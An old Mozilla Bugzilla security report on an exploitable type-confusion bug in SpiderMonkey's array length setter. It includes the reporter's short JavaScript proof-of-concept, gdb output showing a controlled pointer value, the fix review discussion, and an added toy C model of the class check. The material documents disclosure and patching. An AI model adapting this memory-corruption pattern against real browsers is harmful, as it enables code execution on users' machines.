Bug 390598 (Closed)
Opened 17 years ago, closed 17 years ago

array_length_setter() is exploitable

Categories: Core :: JavaScript Engine, defect, P1
Tracking: VERIFIED FIXED, target mozilla1.9alpha8
People: Reporter: sync2d, Assigned: brendan
Keywords: crash, regression, testcase
Whiteboard: [sg:critical] post 1.8-branch
Attachments: 3 files, 2 obsolete files
Description

$ cat array-length.txt
function exploit() {
    var fun = function () {};
    fun.__proto__ = [];
    fun.length = 0x50505050 >> 1;
    fun();
}
exploit();

$ dbg.obj/js array-length.txt
Assertion failure: OBJ_GET_CLASS(cx, obj) == &js_ArrayClass, at jsarray.c:404

$ gdb --eval run --args opt.obj/js array-length.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xaa0750, pc=0xaa3cfa ":", result=0x97ec84) at jsinterp.c:3925
3925        if (fun->flags & JSFUN_INTERPRETED) {
(gdb) print fun
$1 = (JSFunction *) 0x50505050
Comment 1 • 17 years ago

Updated • 17 years ago
Priority: -- → P1
Target Milestone: --- → mozilla1.9 M8
Comment 2 • 17 years ago
Attachment #274976 - Attachment is obsolete: true
Attachment #274978 - Flags: review?(igor)
Attachment #274976 - Flags: review?(igor)

Updated • 17 years ago
Attachment #274978 - Flags: review?(igor) → review+
Comment 3 • 17 years ago
Comment on attachment 274976 [details] [diff] [review] fix

This is OK as a security fix.

Attachment #274976 - Flags: review+
Comment 4 • 17 years ago
(In reply to comment #3)
> (From update of attachment 274976 [details] [diff] [review])
> This is OK as a security fix.

The problem is that

function F() {} F.prototype = []; var x = new F(); x.length = 10;
print(x.length);

now prints 0, not 10 as required by ECMA.
Comment 5 • 17 years ago
(In reply to comment #4)
> (In reply to comment #3)
> > (From update of attachment 274976 [details] [diff] [review] [details])
> > This is OK as a security fix.
>
> The problem is that
>
> function F() {} F.prototype = []; var x = new F(); x.length = 10;
> print(x.length);
>
> now prints 0, not 10 as required by ECMA.

I thought this was an old bug, but I was wrong:

$ ../src.ref/Darwin_DBG.OBJ/js
js> function F() {} F.prototype = []; var x = new F(); x.length = 10;
10
js> x.length
10

Recent regression, due to bug 385393 of course. Let me try to fix it and fix this bug.

/be
Comment 6 • 17 years ago
(My ../src.ref/ tree pre-dates last night's landings.)

/be
Comment 7 • 17 years ago
Attachment #274978 - Attachment is obsolete: true
Attachment #274983 - Flags: review?(igor)
Comment 8 • 17 years ago
Comment on attachment 274983 [details] [diff] [review] alterna-fix 2, restores lost ECMA compat

This is a simple and nice workaround.

Attachment #274983 - Flags: review?(igor) → review+
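The discussion in comments 3 through 8 turns on one check: a native "length" setter that lives on an array can be reached through the prototype chain by an object of some other class, so it must verify the receiver's class before treating it as an array, and it should still give a non-array receiver an ordinary property so that `x.length = 10` reads back as 10. The following toy C model is added here to illustrate that; it is not SpiderMonkey code and not any attachment on this bug. The struct layout, the `array_class`/`function_class`/`object_class` names (stand-ins for the `js_ArrayClass` check quoted in the description), the slot indices, the `FUNCTION_CODE_HANDLE` value and the simplification that a non-array receiver with no own property reads length as 0 (its prototype array being empty) are all assumptions.

```c
/* Toy model of the receiver-class check discussed in this bug.  Added
 * illustration only: not SpiderMonkey code.  Layout, class names, slot
 * indices and the code-handle value are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct ClassModel { const char *name; } ClassModel;

static const ClassModel array_class    = { "Array" };
static const ClassModel function_class = { "Function" };
static const ClassModel object_class   = { "Object" };

/* Slots mean different things per class: arrays keep their length in
 * slot 0, function objects keep a (model) code handle in slot 0.
 * own_length models a single ordinary own property. */
typedef struct ObjectModel {
    const ClassModel *clasp;
    uint32_t slots[2];
    struct { int present; uint32_t value; } own_length;
} ObjectModel;

enum { ARRAY_LENGTH_SLOT = 0, FUNCTION_CODE_SLOT = 0 };
#define FUNCTION_CODE_HANDLE 0x00000001u   /* constructed sample value */

typedef int (*length_setter_fn)(ObjectModel *obj, uint32_t newlen);

/* Vulnerable shape: assumes the receiver is an array because the setter
 * is reached via an array.  A function whose __proto__ is an array reaches
 * it too, and the write lands in the function's code slot. */
static int array_length_setter_unchecked(ObjectModel *obj, uint32_t newlen)
{
    obj->slots[ARRAY_LENGTH_SLOT] = newlen;
    return 1;
}

/* First-cut shape: refuse non-array receivers.  Safe, but the assignment
 * vanishes, which is the "prints 0, not 10" behaviour comment 4 reports. */
static int array_length_setter_bail(ObjectModel *obj, uint32_t newlen)
{
    if (obj->clasp != &array_class)
        return 0;
    obj->slots[ARRAY_LENGTH_SLOT] = newlen;
    return 1;
}

/* Hardened shape: a non-array receiver gets an ordinary own "length"
 * property instead, so x.length = 10 reads back as 10. */
static int array_length_setter_checked(ObjectModel *obj, uint32_t newlen)
{
    if (obj->clasp != &array_class) {
        obj->own_length.present = 1;
        obj->own_length.value = newlen;
        return 1;
    }
    obj->slots[ARRAY_LENGTH_SLOT] = newlen;
    return 1;
}

/* Property read: own property first, then the array slot for real arrays;
 * otherwise the (assumed empty) prototype array's length, 0. */
static uint32_t get_length(const ObjectModel *obj)
{
    if (obj->own_length.present)
        return obj->own_length.value;
    if (obj->clasp == &array_class)
        return obj->slots[ARRAY_LENGTH_SLOT];
    return 0;
}

static ObjectModel make_object(const ClassModel *clasp)
{
    ObjectModel o;
    memset(&o, 0, sizeof o);
    o.clasp = clasp;
    if (clasp == &function_class)
        o.slots[FUNCTION_CODE_SLOT] = FUNCTION_CODE_HANDLE;
    return o;
}

/* Shape of the description's testcase: a function with an array prototype
 * has its length set to 0x50505050 >> 1.  Returns 1 if the code slot
 * survived the setter, 0 if it was overwritten. */
static int code_slot_intact_after(length_setter_fn setter)
{
    ObjectModel fun = make_object(&function_class);
    setter(&fun, 0x50505050u >> 1);
    return fun.slots[FUNCTION_CODE_SLOT] == FUNCTION_CODE_HANDLE;
}

/* Comment 4's compat case: an ordinary instance whose prototype is an
 * array must read back the length assigned to it. */
static uint32_t length_seen_after(length_setter_fn setter)
{
    ObjectModel x = make_object(&object_class);
    setter(&x, 10);
    return get_length(&x);
}

int main(void)
{
    printf("unchecked: code slot intact=%d\n",
           code_slot_intact_after(array_length_setter_unchecked));
    printf("bail:      code slot intact=%d, x.length=%u\n",
           code_slot_intact_after(array_length_setter_bail),
           (unsigned)length_seen_after(array_length_setter_bail));
    printf("checked:   code slot intact=%d, x.length=%u\n",
           code_slot_intact_after(array_length_setter_checked),
           (unsigned)length_seen_after(array_length_setter_checked));
    return 0;
}
```

Running it shows the three outcomes side by side: the unchecked setter clobbers the function's code slot (the model of the `0x50505050` pointer in the gdb session), the bail-out variant keeps the slot intact but loses the assignment, and the class-checked variant both keeps the slot intact and reports `x.length` as 10.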
Updated • 17 years ago
Flags: blocking1.9+

Comment 9 • 17 years ago
Fixed:

js/src/jsarray.c 3.116

/be

Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Comment 10 • 17 years ago

Comment 11 • 17 years ago

Updated • 17 years ago
Flags: in-testsuite+

Updated • 15 years ago
Group: core-security
Flags: wanted1.8.1.x-
Keywords: regression
Whiteboard: [sg:critical] → [sg:critical] post 1.8-branch
Comment 13 • 14 years ago
test checked into 1.9.0, 1.9.1, 1.9.2, tracemonkey. 1.9.3 will get picked up in the next merge.